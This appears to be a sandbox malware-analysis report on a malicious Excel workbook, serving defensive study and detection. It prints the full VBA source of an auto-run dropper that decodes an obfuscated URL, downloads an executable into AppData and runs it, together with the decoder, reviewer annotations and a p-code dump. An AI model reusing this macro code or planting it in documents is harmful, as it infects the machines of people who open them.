MALICIOUS
216
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1566.001 Spearphishing Attachment
The sample is an Excel document containing VBA macros. The Workbook_Open macro is triggered when the document is opened and calls a dropper routine that downloads a second-stage payload into the user's AppData directory and then launches it through ShellExecuteA. The download URL is not stored in clear text: it is kept as the obfuscated string "fyf/ghyehy0uigVO0npd/njbebssfiztfmjsvc00;tquui" and decoded at runtime by the macro's Decrypt routine (string reversal followed by shifting each character code down by one). The "Note: Enable content to display this invoice." message serves as a lure to encourage macro execution.
Heuristics (7)
-
Reference to URLDownloadToFile API — critical — SC_STR_URLDOWNLOAD — Reference to URLDownloadToFile API
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS — Document contains VBA macro code
-
URLDownloadToFile in VBA — critical — OLE_VBA_DOWNLOAD — URLDownloadToFile in VBA. Matched line in script:
Private Declare PtrSafe Function gFFhpBexdAS Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal sSeXqZwgrwtEVkst As Long, ByVal CbUyAhnGOEkfgejTbiyY As String, _ ByVal YpfhYy As String, ByVal bFDlZulcp As Long, ByVal AjiVVxFRuNtRjv As Long) As Long -
Workbook_Open macro — low — OLE_VBA_WBOPEN — Workbook_Open macro. Matched line in script:
Sub Workbook_Open() -
Environ() call (env variable access) — low — OLE_VBA_ENVIRON — Environ() call (env variable access). Matched line in script:
DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE = Decrypt("fyf/uuse") IWhBPCpPmlNvIWhBPCpPmlNv = Environ$("AppData") & "\" & DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE -
Reference to ShellExecute API — high — SC_STR_SHELLEXEC — Reference to ShellExecute API
-
Macro/content-enable lure — medium — SE_ENABLE_LURE — Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12838 bytes |
| SHA-256: 859e55877b3b3bad5d3b457ae77b33451ec6cbefc67ac84e5fda4df5ae8e1f47 | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Empty placeholder routine; Module1 contains nothing else and no other routine in this listing references it.
' NOTE(review): the p-code dump further down lists Module1's only routine as "Sub timeGetTime()", not "Bill" —
' the decompressed source and the compiled p-code do not use the same identifier names.
Sub Bill()
End Sub
Attribute VB_Name = "KFLkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' --- Win32 API imports ---
' Four differently-named imports from winmm.dll (etTime, timeGetTime, imeGetTime, meGetTime). None of them is called
' anywhere in this listing, so they look like decoy/padding declarations; the first two also lack PtrSafe and would
' likely fail to compile under 64-bit Office.
Private Declare Function etTime Lib "winmm.dll" () As Long
Private Declare Function timeGetTime Lib "winmm.dll" () As Long
Private Declare PtrSafe Function imeGetTime Lib "winmm.dll" () As Long
' shell32!ShellExecuteA behind a randomised alias; used by the dropper routine below to launch the downloaded file.
Private Declare PtrSafe Function BQxDWfUAvwuz Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal jhbtqMwHMJUmn As Long, ByVal IJSrXBQxDW As String, _
ByVal fUAvwuzke As String, ByVal lOqbrvxpOr As String, ByVal VGCqLBsGQzz As String, ByVal mYzV As Long) As Long
' urlmon!URLDownloadToFileA behind a randomised alias; used by the dropper routine below to fetch the payload to disk.
Private Declare PtrSafe Function gFFhpBexdAS Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sSeXqZwgrwtEVkst As Long, ByVal CbUyAhnGOEkfgejTbiyY As String, _
ByVal YpfhYy As String, ByVal bFDlZulcp As Long, ByVal AjiVVxFRuNtRjv As Long) As Long
Private Declare PtrSafe Function meGetTime Lib "winmm.dll" () As Long
' Dropper routine, reached only from Workbook_Open.
' Flow: decode an obfuscated filename and URL with Decrypt(), download the URL to %AppData%\<decoded name> via the
' URLDownloadToFileA import (gFFhpBexdAS), then launch that file with the ShellExecuteA import (BQxDWfUAvwuz, verb "open").
' Detection angle: EXCEL.EXE performing urlmon network egress, writing a new file directly under %AppData%, and then
' spawning a child process from that path — all within moments of the workbook opening.
' NOTE(review): the p-code dump on this page shows this same routine (identical string literals) under the name
' JEikQJMGMFhvvVHVM and the decoder under the name lashed; source and compiled names disagree, so confirm behaviour
' against the p-code rather than the source text alone.
Sub MyCcCNHZWtPogcoFTpdm()
' Only the first three locals are used; the remaining three are never assigned or read.
Dim GdzXeZloDYZktoRhAUniXGdzXeZloDYZktoRhAUniXn As String
Dim DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE As String
Dim IWhBPCpPmlNvIWhBPCpPmlNv As String
Dim JEikQJMGMFhvvVHVM As String
Dim qyoTddHGVHDMHGFgkjJYGYFMukjb As String
Dim bgDKRwIIXcfWvKDnUXsUbgDKRwIIXcfWvKDnUXsU As String
' Payload filename, stored obfuscated and decoded at runtime.
DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE = Decrypt("fyf/uuse")
' Drop path: %AppData%\<decoded filename> (Environ$ reads the real environment variable here).
IWhBPCpPmlNvIWhBPCpPmlNv = Environ$("AppData") & "\" & DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE
' Download URL, also stored obfuscated; this literal is the one quoted in the report summary above.
GdzXeZloDYZktoRhAUniXGdzXeZloDYZktoRhAUniXn = Decrypt("fyf/ghyehy0uigVO0npd/njbebssfiztfmjsvc00;tquui")
' URLDownloadToFileA(NULL, url, localPath, 0, NULL) — return value is ignored, so a failed download still falls through.
gFFhpBexdAS 0, GdzXeZloDYZktoRhAUniXGdzXeZloDYZktoRhAUniXn, IWhBPCpPmlNvIWhBPCpPmlNv, 0, 0
' ShellExecuteA(NULL, "open", localPath, "", NULL, SW_SHOWNORMAL) — executes whatever was written to the drop path.
BQxDWfUAvwuz 0, "open", IWhBPCpPmlNvIWhBPCpPmlNv, "", vbNullString, vbNormalFocus
End Sub
' --- Filler / junk code ---
' The four Function definitions below (lashed, Tashed, Dashed, Hashed) are near-identical copies with no End Function,
' no assignment to the function name, and references to names that are never declared (burgerorgan instead of the
' parameter urgerorgan; the pe3a8c.../be3a8c... variables in the later copies). Nothing in this listing calls any of
' them, so they appear to be padding meant to bloat and obfuscate the module rather than executable logic. A Function
' cannot open inside another Function in VBA, so this text could not compile as shown — another sign that the
' decompressed source differs from what was compiled (the p-code dump names these routines differently as well).
Function lashed(urgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d3 As Double
Dim pe3a8c1f30f1abadd648e22b16fdb57z3 As Variant
pe3a8c1f30f1abadd648e22b16fdb57z3 = -678.507
be3a8c1f30f1abadd648e22b16fdb57d3 = 642.162
Dim columnwall As Byte
' Copy 2 of the filler function (same shape, different variable types).
Function Tashed(urgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim Pe3a8c1f30f1abadd648e22b16fdb87d3 As Double
Dim pe3a8c1f30f1abadd648e22b16fdb87z3 As Variant
pe3a8c1f30f1abadd648e22b16fdb57z3 = -678.507
be3a8c1f30f1abadd648e22b16fdb57d3 = 642.162
Dim columnwall As Variant
' Copy 3 of the filler function.
Function Dashed(urgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim Ue3a8c1f30f1abadd648e22b16fdb97d3 As Double
Dim Ue3a8c1f30f1abadd648e22b16fdb97z3 As Variant
pe3a8c1f30f1abadd648e22b16fdb57z3 = -678.507
be3a8c1f30f1abadd648e22b16fdb57d3 = 642.162
Dim columnwall As Variant
' Copy 4 of the filler function.
Function Hashed(urgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim ve3a8c1f30f1abadd648e22b16fdb77d3 As Double
Dim ve3a8c1f30f1abadd648e22b16fdb77z3 As Single
pe3a8c1f30f1abadd648e22b16fdb57z3 = -678.507
be3a8c1f30f1abadd648e22b16fdb57d3 = 642.162
Dim columnwall As Variant
' Filler call chain, link 1 of 9: only calls the next link; no return value is ever assigned.
' Nothing in this source listing calls it (Workbook_Open goes straight to the dropper), so the whole chain is dead code.
Function rnIkDDisHp4e1dEwtDO8XRgW() As Currency
Call t5IOznwCrl
End Function
' Filler call chain, link 2: forwards to W6kt90kDRkudpcs1fW4Dp62rz. Static has no effect here — there are no locals to persist.
Static Function t5IOznwCrl() As Integer
Call W6kt90kDRkudpcs1fW4Dp62rz
End Function
' Filler call chain, link 3: forwards to Jb8AvPk2VR.
Function W6kt90kDRkudpcs1fW4Dp62rz() As Single
Call Jb8AvPk2VR
End Function
' Filler call chain, link 4: forwards to BHyE3XYkFXIADNkqTJW8h3uw.
Static Function Jb8AvPk2VR() As Date
Call BHyE3XYkFXIADNkqTJW8h3uw
End Function
' Filler call chain, link 5: forwards to JxU0xFkI7x.
Function BHyE3XYkFXIADNkqTJW8h3uw() As Variant
Call JxU0xFkI7x
End Function
' Filler call chain, link 6: forwards to xS2rvCsRX6OdVekrzGwrPUM9.
Static Function JxU0xFkI7x() As Date
Call xS2rvCsRX6OdVekrzGwrPUM9
End Function
' Filler call chain, link 7: forwards to hx2errEArb.
Function xS2rvCsRX6OdVekrzGwrPUM9() As Variant
Call hx2errEArb
End Function
' Filler call chain, link 8: forwards to WCbBQoVfs4z78EDlkYXBK4r3.
Static Function hx2errEArb() As Double
Call WCbBQoVfs4z78EDlkYXBK4r3
End Function
' Filler call chain, last link: calls FZ4yZPaWVH, which is not defined anywhere in this decompressed source (the p-code
' dump further down does list a FZ4yZPaWVH). The source text therefore would not compile as shown — further evidence
' that the source and the compiled p-code differ.
Function WCbBQoVfs4z78EDlkYXBK4r3() As Single
Call FZ4yZPaWVH
End Function
' Auto-execute entry point (MITRE T1059.005 / T1204.002): runs as soon as the workbook opens with content enabled and
' hands straight off to the dropper routine. The "Enable content" lure noted in the report exists to get past this gate.
Sub Workbook_Open()
MyCcCNHZWtPogcoFTpdm
End Sub
' String de-obfuscation helper used for the payload filename and URL.
' Scheme: reverse the input, then shift every character down by one code point (Chr(Asc(c) - 1)).
' Parameter: enc — obfuscated string. It is passed ByRef and overwritten with its reversal, but both callers pass
' literals, so there is no observable side effect.
' Returns: the decoded string.
Function Decrypt(enc)
' Only asil is typed Byte; x, n and AppData are Variants (the "As" clause applies to the last name only).
' AppData here is just a local accumulator — unrelated to the %AppData% environment variable read by the caller.
Dim x, n, AppData, asil As Byte
enc = StrReverse(enc)
For n = 1 To Len(enc)
x = Mid(enc, n, 1)
AppData = AppData & Chr(Asc(x) - 1)
Next
Decrypt = AppData
' Junk loop: NUi is never declared or assigned, so Len(NUi) is 0 and the body never runs.
For asil = 1 To Len(NUi)
Next
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_fabs5sdr
' ===============================================================================
' Module streams (p-code disassembly). NOTE: the identifier names resolved here do not match the decompressed source above — the downloader Sub appears as JEikQJMGMFhvvVHVM and the string decoder as lashed, where the source names them MyCcCNHZWtPogcoFTpdm and Decrypt — which suggests the source text and the compiled p-code diverge (consistent with identifier-table tampering or VBA stomping); since Office executes the p-code when its VBA version matches the sample's, prefer this section when confirming behaviour.
' _VBA_PROJECT_CUR/VBA/Module1 - 951 bytes
' Line #0:
' FuncDefn (Sub timeGetTime())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/KFLkbook - 10838 bytes
' Line #0:
' FuncDefn (Private Declare Function BQxDWfUAvwuz Lib "jhbtqMwHMJUmn" () As Long)
' Line #1:
' Line #2:
' FuncDefn (Private Declare Function IJSrXBQxDW Lib "jhbtqMwHMJUmn" () As Long)
' Line #3:
' Line #4:
' FuncDefn (Private Declare PtrSafe Function fUAvwuzke Lib "jhbtqMwHMJUmn" () As Long)
' Line #5:
' Line #6:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function lOqbrvxpOr Lib "YpfhYy" (ByVal VGCqLBsGQzz As Long, ByVal mYzV As String, ByVal shell32.dll As String, ByVal gFFhpBexdAS As String, ByVal sSeXqZwgrwtEVkst As String, ByVal CbUyAhnGOEkfgejTbiyY As Long) As Long)
' Line #7:
' Line #8:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function bFDlZulcp Lib "DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE" (ByVal AjiVVxFRuNtRjv As Long, ByVal urlmon As String, ByVal meGetTime As String, ByVal MyCcCNHZWtPogcoFTpdm As Long, ByVal GdzXeZloDYZktoRhAUniXGdzXeZloDYZktoRhAUniXn As Long) As Long)
' Line #9:
' Line #10:
' FuncDefn (Private Declare PtrSafe Function IWhBPCpPmlNvIWhBPCpPmlNv Lib "jhbtqMwHMJUmn" () As Long)
' Line #11:
' Line #12:
' FuncDefn (Sub JEikQJMGMFhvvVHVM())
' Line #13:
' Dim
' VarDefn qyoTddHGVHDMHGFgkjJYGYFMukjb (As String)
' Line #14:
' Dim
' VarDefn bgDKRwIIXcfWvKDnUXsUbgDKRwIIXcfWvKDnUXsU (As String)
' Line #15:
' Dim
' VarDefn Decrypt (As String)
' Line #16:
' Dim
' VarDefn Environ (As String)
' Line #17:
' Dim
' VarDefn vbNullString (As String)
' Line #18:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #19:
' LitStr 0x0008 "fyf/uuse"
' ArgsLd lashed 0x0001
' St bgDKRwIIXcfWvKDnUXsUbgDKRwIIXcfWvKDnUXsU
' Line #20:
' LitStr 0x0007 "AppData"
' ArgsLd urgerorgan$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld bgDKRwIIXcfWvKDnUXsUbgDKRwIIXcfWvKDnUXsU
' Concat
' St Decrypt
' Line #21:
' Line #22:
' Line #23:
' LitStr 0x002E "fyf/ghyehy0uigVO0npd/njbebssfiztfmjsvc00;tquui"
' ArgsLd lashed 0x0001
' St qyoTddHGVHDMHGFgkjJYGYFMukjb
' Line #24:
' Line #25:
' LitDI2 0x0000
' Ld qyoTddHGVHDMHGFgkjJYGYFMukjb
' Ld Decrypt
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall bFDlZulcp 0x0005
' Line #26:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Decrypt
' LitStr 0x0000 ""
' Ld bonusshoot
' Ld qoxnwkqnhfshhimr
' ArgsCall lOqbrvxpOr 0x0006
' Line #27:
' EndSub
' Line #28:
' Line #29:
' FuncDefn (Function burgerorgan(be3a8c1f30f1abadd648e22b16fdb57d3, pe3a8c1f30f1abadd648e22b16fdb57z3, id_FFFE As Variant))
' Line #30:
' LitStr 0x0001 "*"
' Ld rnIkDDisHp4e1dEwtDO8XRgW
' Concat
' LitStr 0x0001 "*"
' Concat
' St columnwall
' Line #31:
' Dim
' VarDefn t5IOznwCrl (As Double)
' Line #32:
' Dim
' VarDefn W6kt90kDRkudpcs1fW4Dp62rz (As Variant)
' Line #33:
' LitR8 0x1893 0x5604 0x340E 0x4085
' UMi
' St W6kt90kDRkudpcs1fW4Dp62rz
' Line #34:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St t5IOznwCrl
' Line #35:
' Dim
' VarDefn Jb8AvPk2VR (As Byte)
' Line #36:
' Line #37:
' FuncDefn (Function Dashed(be3a8c1f30f1abadd648e22b16fdb57d3, pe3a8c1f30f1abadd648e22b16fdb57z3, id_FFFE As Variant))
' Line #38:
' LitStr 0x0001 "*"
' Ld rnIkDDisHp4e1dEwtDO8XRgW
' Concat
' LitStr 0x0001 "*"
' Concat
' St columnwall
' Line #39:
' Dim
' VarDefn Ue3a8c1f30f1abadd648e22b16fdb97d3 (As Double)
' Line #40:
' Dim
' VarDefn Ue3a8c1f30f1abadd648e22b16fdb87z3 (As Variant)
' Line #41:
' LitR8 0x1893 0x5604 0x340E 0x4085
' UMi
' St W6kt90kDRkudpcs1fW4Dp62rz
' Line #42:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St t5IOznwCrl
' Line #43:
' Dim
' VarDefn Jb8AvPk2VR (As Variant)
' Line #44:
' Line #45:
' FuncDefn (Function Ue3a8c1f30f1abadd648e22b16fdb97z3(be3a8c1f30f1abadd648e22b16fdb57d3, pe3a8c1f30f1abadd648e22b16fdb57z3, id_FFFE As Variant))
' Line #46:
' LitStr 0x0001 "*"
' Ld rnIkDDisHp4e1dEwtDO8XRgW
' Concat
' LitStr 0x0001 "*"
' Concat
' St columnwall
' Line #47:
' Dim
' VarDefn ve3a8c1f30f1abadd648e22b16fdb97z3 (As Double)
' Line #48:
' Dim
' VarDefn ve3a8c1f30f1abadd648e22b16fdb77d3 (As Variant)
' Line #49:
' LitR8 0x1893 0x5604 0x340E 0x4085
' UMi
' St W6kt90kDRkudpcs1fW4Dp62rz
' Line #50:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St t5IOznwCrl
' Line #51:
' Dim
' VarDefn Jb8AvPk2VR (As Variant)
' Line #52:
' Line #53:
' FuncDefn (Function ve3a8c1f30f1abadd648e22b16fdb77z3(be3a8c1f30f1abadd648e22b16fdb57d3, pe3a8c1f30f1abadd648e22b16fdb57z3, id_FFFE As Variant))
' Line #54:
' LitStr 0x0001 "*"
' Ld rnIkDDisHp4e1dEwtDO8XRgW
' Concat
' LitStr 0x0001 "*"
' Concat
' St columnwall
' Line #55:
' Dim
' VarDefn id_02C6 (As Double)
' Line #56:
' Dim
' VarDefn id_02C8 (As Single)
' Line #57:
' LitR8 0x1893 0x5604 0x340E 0x4085
' UMi
' St W6kt90kDRkudpcs1fW4Dp62rz
' Line #58:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St t5IOznwCrl
' Line #59:
' Dim
' VarDefn Jb8AvPk2VR (As Variant)
' Line #60:
' Line #61:
' FuncDefn (Function BHyE3XYkFXIADNkqTJW8h3uw(id_FFFE As Currency) As Currency)
' Line #62:
' ArgsCall (Call) JxU0xFkI7x 0x0000
' Line #63:
' EndFunc
' Line #64:
' FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #65:
' ArgsCall (Call) xS2rvCsRX6OdVekrzGwrPUM9 0x0000
' Line #66:
' EndFunc
' Line #67:
' FuncDefn (Function xS2rvCsRX6OdVekrzGwrPUM9(id_FFFE As Single) As Single)
' Line #68:
' ArgsCall (Call) hx2errEArb 0x0000
' Line #69:
' EndFunc
' Line #70:
' FuncDefn (Static Function hx2errEArb(id_FFFE As Date) As Date)
' Line #71:
' ArgsCall (Call) WCbBQoVfs4z78EDlkYXBK4r3 0x0000
' Line #72:
' EndFunc
' Line #73:
' FuncDefn (Function WCbBQoVfs4z78EDlkYXBK4r3(id_FFFE As Variant) As Variant)
' Line #74:
' ArgsCall (Call) FZ4yZPaWVH 0x0000
' Line #75:
' EndFunc
' Line #76:
' FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #77:
' ArgsCall (Call) Workbook_Open 0x0000
' Line #78:
' EndFunc
' Line #79:
' FuncDefn (Function Workbook_Open(id_FFFE As Variant) As Variant)
' Line #80:
' ArgsCall (Call) enc 0x0000
' Line #81:
' EndFunc
' Line #82:
' FuncDefn (Static Function enc(id_FFFE As Double) As Double)
' Line #83:
' ArgsCall (Call) x 0x0000
' Line #84:
' EndFunc
' Line #85:
' FuncDefn (Function x(id_FFFE As Single) As Single)
' Line #86:
' ArgsCall (Call) n 0x0000
' Line #87:
' EndFunc
' Line #88:
' Line #89:
' FuncDefn (Sub AppData())
' Line #90:
' Line #91:
' ArgsCall JEikQJMGMFhvvVHVM 0x0000
' Line #92:
' EndSub
' Line #93:
' Line #94:
' FuncDefn (Function lashed(asil, id_FFFE As Variant))
' Line #95:
' Dim
' VarDefn StrReverse
' VarDefn Chr
' VarDefn Asc
' VarDefn NUi (As Byte)
' Line #96:
' Ld asil
' ArgsLd Sheet1 0x0001
' St asil
' Line #97:
' StartForVariable
' Ld Chr
' EndForVariable
' LitDI2 0x0001
' Ld asil
' FnLen
' For
' Line #98:
' Ld asil
' Ld Chr
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St StrReverse
' Line #99:
' Ld Asc
' Ld StrReverse
' ArgsLd Sheet3 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd Sheet2 0x0001
' Concat
' St Asc
' Line #100:
' StartForVariable
' Next
' Line #101:
' Ld Asc
' St lashed
' Line #102:
' StartForVariable
' Ld NUi
' EndForVariable
' LitDI2 0x0001
' Ld Workbook
' FnLen
' For
' Line #103:
' StartForVariable
' Next
' Line #104:
' EndFunc
' Line #105:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes